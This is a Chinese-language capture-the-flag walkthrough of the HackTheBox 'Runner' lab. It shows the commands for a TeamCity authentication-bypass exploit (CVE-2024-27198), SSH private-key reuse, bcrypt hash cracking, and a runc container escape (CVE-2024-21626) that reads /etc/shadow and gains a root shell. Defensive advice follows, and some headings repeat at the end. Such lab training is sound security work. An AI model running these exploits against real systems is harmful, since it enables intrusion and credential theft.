HackTheBox Runner 渗透测试完整指南<\/h1>

1. 目标概述<\/h2>

Runner 是 HackTheBox 平台上的一个中等难度 Linux 靶机，涉及以下技术点：<\/p>

TeamCity CI\/CD 平台漏洞利用 (CVE-2024-27198)<\/li>
SSH 私钥泄露与利用<\/li>
Portainer 容器管理平台<\/li>
Docker 容器逃逸 (CVE-2024-21626)<\/li>

密码哈希破解与横向移动<\/li> <\/ul>

2. 初始信息收集<\/h2>

2.1 端口扫描<\/h3>

使用 Nmap 进行全端口扫描：<\/p>

nmap -A -Pn 10.10.11.13 -sV -oN Runner.tcp
<\/span><\/span><\/code><\/pre>扫描结果：<\/p>
PORT     STATE    SERVICE    VERSION
22\/tcp   open     ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.6
80\/tcp   open     http       nginx 1.18.0 (Ubuntu)
981\/tcp  filtered unknown
1096\/tcp filtered cnrprotocol
8000\/tcp open     nagios-nsca Nagios NSCA
10566\/tcp filtered unknown
<\/code><\/pre>
2.2 Web 服务枚举<\/h3>
80 端口<\/h4>

重定向到 http:\/\/runner.htb\/<\/li>
标准产品展示页面，无直接可利用点<\/li>
<\/ul>
8000 端口<\/h4>

Nagios NSCA 服务<\/li>
目录扫描发现 \/health<\/code> 和 \/version<\/code> 端点，但无有用信息<\/li>
<\/ul>
2.3 虚拟主机爆破<\/h3>
使用 ffuf 进行子域名枚举：<\/p>
ffuf -u http:\/\/runner.htb -w SecLists\/Discovery\/DNS\/bitquark-subdomains-top100000.txt -H "Host: FUZZ.runner.htb"<\/span> -fw 4<\/span>
<\/span><\/span><\/code><\/pre>发现子域名：<\/p>

teamcity.runner.htb (返回 401 状态码)<\/li>
<\/ul>
3. TeamCity 漏洞利用<\/h2>
3.1 TeamCity 简介<\/h3>
TeamCity 是 JetBrains 开发的持续集成和持续交付(CI\/CD)工具，支持多种技术栈。<\/p>
3.2 CVE-2024-27198 漏洞利用<\/h3>
这是一个身份验证绕过漏洞，允许创建管理员账户。<\/p>
利用步骤：<\/p>


下载漏洞利用脚本：<\/p>
wget https:\/\/github.com\/yoryio\/CVE-2024-27198\/raw\/main\/CVE-2024-27198.py
<\/span><\/span><\/code><\/pre><\/li>

执行漏洞利用：<\/p>
python3 CVE-2024-27198.py -t http:\/\/teamcity.runner.htb -u attacker -p attacker
<\/span><\/span><\/code><\/pre><\/li>

成功创建管理员账户后，登录 TeamCity 控制台<\/p>
<\/li>
<\/ol>
3.3 获取初始访问权限<\/h3>
在 TeamCity 控制台中：<\/p>

浏览项目配置<\/li>
在 AllProjects > pluginData > ssh_keys<\/code> 目录下发现 SSH 私钥文件 id_rsa<\/code><\/li>
下载私钥文件<\/li>
<\/ol>
使用发现的私钥尝试 SSH 登录：<\/p>
chmod 600<\/span> id_rsa
<\/span><\/span>ssh -i id_rsa john@runner.htb
<\/span><\/span><\/code><\/pre>成功获取初始 shell 作为 john<\/code> 用户。<\/p>
4. 权限提升路径<\/h2>
4.1 系统信息收集<\/h3>
检查当前用户权限：<\/p>
id
<\/span><\/span>whoami
<\/span><\/span><\/code><\/pre>检查系统进程和网络连接：<\/p>
netstat -ntpl
<\/span><\/span>ps aux
<\/span><\/span><\/code><\/pre>发现关键服务：<\/p>

127.0.0.1:9443 - 未知服务<\/li>
127.0.0.1:8111 - TeamCity<\/li>
127.0.0.1:9000 - Portainer<\/li>
<\/ul>
检查 \/opt 目录：<\/p>
ls \/opt
<\/span><\/span><\/code><\/pre>发现：<\/p>

containerd<\/li>
portainer<\/li>
<\/ul>
4.2 横向移动至 matthew 用户<\/h3>


从 TeamCity 备份中提取用户哈希：<\/p>
sudo cat database_dump\/users
<\/span><\/span><\/code><\/pre>获取到 matthew 的密码哈希：<\/p>
$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K\/YPHbD48\/JQsdGLulmeVo.Em
<\/code><\/pre>
<\/li>

使用 hashcat 破解哈希：<\/p>
hashcat -m3200 '$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K\/YPHbD48\/JQsdGLulmeVo.Em'<\/span> rockyou.txt --force
<\/span><\/span><\/code><\/pre>破解结果：piper123<\/code><\/p>
<\/li>

尝试使用该密码 SSH 登录 matthew 用户：<\/p>
ssh matthew@runner.htb
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
4.3 通过 Portainer 提升权限<\/h3>


设置 SSH 端口转发访问本地的 Portainer：<\/p>
ssh -L 9000:127.0.0.1:9000 matthew@runner.htb -fN
<\/span><\/span><\/code><\/pre><\/li>

浏览器访问 http:\/\/localhost:9000<\/code>，使用 matthew:piper123 登录<\/p>
<\/li>

在 Portainer 中创建或管理容器，获取 root 权限<\/p>
<\/li>
<\/ol>
4.4 利用 CVE-2024-21626 容器逃逸<\/h3>


在 Portainer 中创建新容器，使用以下配置：<\/p>
docker run -w \/proc\/self\/fd\/8 --name cve-2024-21626 --rm -it debian:bookworm
<\/span><\/span><\/code><\/pre><\/li>

在容器内获取主机文件系统访问：<\/p>
cat \/proc\/self\/root\/etc\/shadow
<\/span><\/span><\/code><\/pre><\/li>

或者直接获取 root shell：<\/p>
chroot \/proc\/self\/root bash
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
5. 替代提权路径<\/h2>
如果无法通过 Portainer 提权，可尝试以下方法：<\/p>


检查不安全的挂载点：<\/p>
cat \/etc\/fstab
<\/span><\/span><\/code><\/pre><\/li>

查找 SUID 文件：<\/p>
find \/ -perm -4000 -type f 2>\/dev\/null
<\/span><\/span><\/code><\/pre><\/li>

检查 cron 作业：<\/p>
crontab -l
<\/span><\/span>ls -la \/etc\/cron*
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
6. 总结与关键点<\/h2>

信息收集是关键<\/strong>：全面的端口扫描和子域名枚举发现了 TeamCity 入口<\/li>
CVE 利用<\/strong>：及时查找和应用公开漏洞 (CVE-2024-27198)<\/li>
凭证管理<\/strong>：在 CI\/CD 平台中经常存储敏感凭证，如 SSH 密钥<\/li>
横向移动<\/strong>：密码复用是常见问题，哈希破解可以扩大访问范围<\/li>
容器安全<\/strong>：不当的容器配置可能导致容器逃逸和权限提升<\/li>
<\/ol>
7. 防御建议<\/h2>

及时更新 CI\/CD 平台和容器运行时<\/li>
避免在版本控制或配置管理中存储明文凭证<\/li>
实施最小权限原则，限制容器权限<\/li>
使用强密码策略并避免密码复用<\/li>
定期审计系统配置和权限设置<\/li>
<\/ol>
通过这份指南，您应该能够全面理解 Runner 靶机的渗透测试过程，并掌握相关的安全概念和技术。<\/p>

HackTheBox Runner 渗透测试完整指南<\/h1>

2. 初始信息收集<\/h2>

2.2 Web 服务枚举<\/h3>

3. TeamCity 漏洞利用<\/h2>

3.1 TeamCity 简介<\/h3> TeamCity 是 JetBrains 开发的持续集成和持续交付(CI\/CD)工具，支持多种技术栈。<\/p>

3.1 TeamCity 简介<\/h3>
TeamCity 是 JetBrains 开发的持续集成和持续交付(CI\/CD)工具，支持多种技术栈。<\/p>